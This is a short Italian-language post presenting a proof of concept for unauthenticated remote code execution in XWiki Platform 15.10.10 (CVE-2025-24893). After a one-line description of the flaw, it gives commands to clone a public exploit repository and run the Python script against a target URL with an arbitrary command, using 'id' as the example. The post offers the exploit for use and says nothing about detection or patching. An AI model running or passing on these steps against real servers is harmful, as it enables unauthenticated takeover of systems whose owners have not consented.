
PoC | XWiki Platform 15.10.10 - Esecuzione di codice remoto
Una vulnerabilità di categoria RCE (Remote Code Execution), riscontrata quando attaccanti non autenticati possono eseguire codice Groovy arbitrario da remoto senza autenticazione né accesso preliminare (Guest User). Di seguito un PoC (Proof-Of-Concept) in Python per lo sfruttamento di questa vulnerabilità.
git clone https://github.com/zs1n/CVE-2025-24893
python3 CVE-2025-24893.py -u <url> -c <command>
python3 CVE-2025-24893.py -u https://domain.com -c 'id'